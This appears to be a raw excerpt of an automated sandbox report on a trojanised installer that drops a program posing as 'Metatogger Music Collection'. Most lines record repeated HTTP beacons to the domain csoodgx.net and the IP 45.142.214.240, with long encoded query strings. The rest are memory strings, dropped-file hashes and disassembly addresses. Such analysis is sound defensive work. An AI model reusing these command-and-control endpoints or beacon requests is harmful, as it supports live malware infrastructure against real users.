        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknownDNS traffic detected: queries for: csoodgx.net
        Source: metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/
        Source: metatoggermusiccollection.exe, 00000004.00000002.3216869641.0000000003390000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3216976399.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e99586
        Source: metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df
        Source: is-QO8P8.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vovsoft.com
        Source: file.tmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.drString found in binary or memory: http://www.innosetup.com/
        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org).
        Source: file.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
        Source: file.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU
        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vovsoft.com/contact/
        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vovsoft.com/contact/.
        Source: file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vovsoft.com/newsletter/
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0042ED54 NtdllDefWindowProc_A,1_2_0042ED54
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00423AF4 NtdllDefWindowProc_A,1_2_00423AF4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00412548 NtdllDefWindowProc_A,1_2_00412548
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00455448 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00455448
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00473A10 NtdllDefWindowProc_A,1_2_00473A10
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0042E6DC: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E6DC
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_0040936C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00453D4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00453D4C
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004083300_2_00408330
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0046C0D01_2_0046C0D0
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00434B5C1_2_00434B5C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0047B0A31_2_0047B0A3
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004637D41_2_004637D4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004443041_2_00444304
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0045C4C41_2_0045C4C4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004307001_2_00430700
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004449FC1_2_004449FC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00480B581_2_00480B58
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00444E081_2_00444E08
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004594981_2_00459498
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0043D5E41_2_0043D5E4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004658241_2_00465824
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00481A301_2_00481A30
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00487BD41_2_00487BD4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0042FB901_2_0042FB90
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00443D5C1_2_00443D5C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00433E581_2_00433E58
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_022E1E901_2_022E1E90
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_022E12001_2_022E1200
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_022E17301_2_022E1730
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 3_2_004010513_2_00401051
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 3_2_00401C263_2_00401C26
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_004010514_2_00401051
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_00401C264_2_00401C26
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02B0BCEB4_2_02B0BCEB
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02B0BD584_2_02B0BD58
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AF53A04_2_02AF53A0
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AEE18D4_2_02AEE18D
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AE9E844_2_02AE9E84
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AF4E294_2_02AF4E29
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02ADEFAD4_2_02ADEFAD
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AEDC994_2_02AEDC99
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AEAC3A4_2_02AEAC3A
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AE84424_2_02AE8442
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AEE5A54_2_02AEE5A5
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: 4_2_02AF2DB44_2_02AF2DB4
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp 9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00405964 appears 101 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00406A2C appears 38 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00455DD4 appears 68 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00403400 appears 59 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00445668 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00455BC8 appears 95 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00433D70 appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 0040785C appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00451CC8 appears 88 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00408B74 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00403494 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00445938 appears 59 times
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: String function: 00403684 appears 211 times
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: String function: 02AF5330 appears 138 times
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: String function: 02AE8AE0 appears 37 times
        Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: file.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-B2M6R.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-B2M6R.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: is-B2M6R.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-B2M6R.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-B2M6R.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-QO8P8.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: file.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpSection loaded: apphelp.dllJump to behavior
